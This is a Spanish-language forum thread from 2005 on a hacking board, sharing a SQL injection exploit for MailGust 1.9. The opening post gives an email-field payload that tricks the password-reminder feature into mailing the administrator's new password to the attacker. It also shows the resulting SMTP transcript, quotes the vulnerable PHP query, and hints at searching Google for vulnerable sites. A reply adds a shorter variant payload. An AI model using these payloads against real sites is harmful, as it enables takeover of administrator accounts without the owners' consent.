elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:10  


Tema destacado: ¡Aprende hacking con práctica! - WarZone, el wargame de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  MailGust 1,9 -SQL injection		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MailGust 1,9 -SQL injection  (Leído 558 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
MailGust 1,9 -SQL injection
« en: 28 Septiembre 2005, 00:38 »
la vulnerabilidad consiste en q un usuario puede enviarse una nueva contraseña del admin usando la opcion¨ recordatorio de la contraseña¨, colocando en el campo del email:

Código:
[ tu_email], 'or'a'='a'/*@hotmail.com

ejemplo de mail enviado por la web vulnerable:

Código:
220 [MAILSERVER] SMTP Service ready
HELO [MAILGUST]
250  [MAILSERVER].
MAIL FROM:<me@localhost.com>
250 MAIL FROM:<me@localhost.com> OK
RCPT TO:<[tu_email]>
250 RCPT TO:>[tu_email] OK
RCPT TO:<'or'a'='a'/*@hotmail.com>
250 RCPT TO:<'or'a'='a'/*@hotmail.com> OK
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Date: Sat, 24 Sep 2005 16:11:38 +0100
Subject: New password
To: [tu_email],'or'a'='a'/*@hotmail.com
From: systemxxx@localhost.com
Your login name is: [admin_email]
Your new password is: 4993587
Click here:
http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114
to activate the password, than try to log in!

It is recommended that you change your password afterwards.
.
250 <4335105B00009AE2> Mail accepted
QUIT
221 [MAILSERVER] QUIT

la pregunta vulnerable esta dentro de:

Código:
[path_to_mailgust]/gorum/user_email.php at line 363:
...
$query = "SELECT * FROM $applName"."_$userClassName ".
             "WHERE email='$this->email'";
...

buscando en google ;)

Resultados 31 - 40 de aproximadamente 15.200

fuente:packetstorm.linuxsecurity.com

Salu2
« Última modificación: 28 Septiembre 2005, 00:41 por mousehack » En línea


VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: MailGust 1,9 -SQL injection
« Respuesta #1 en: 28 Septiembre 2005, 02:30 »
jaja vas a decirme que porque digo que todos son preconocidos?

este no lo conocia.. muy util :D

Código:
[ tu_email], 'or'1'/*@hotmail.com

y si no me equivoco.. funcionaria el anterior tambien
En línea


Leer reglas
- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net
oRTNZ


Desconectado Desconectado

Mensajes: 808


no no soy malo... soy vicioso :p


Ver Perfil
Re: MailGust 1,9 -SQL injection
« Respuesta #2 en: 28 Septiembre 2005, 19:31 »
See esto tampoco lo conocia,  :P, saludos
En línea
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines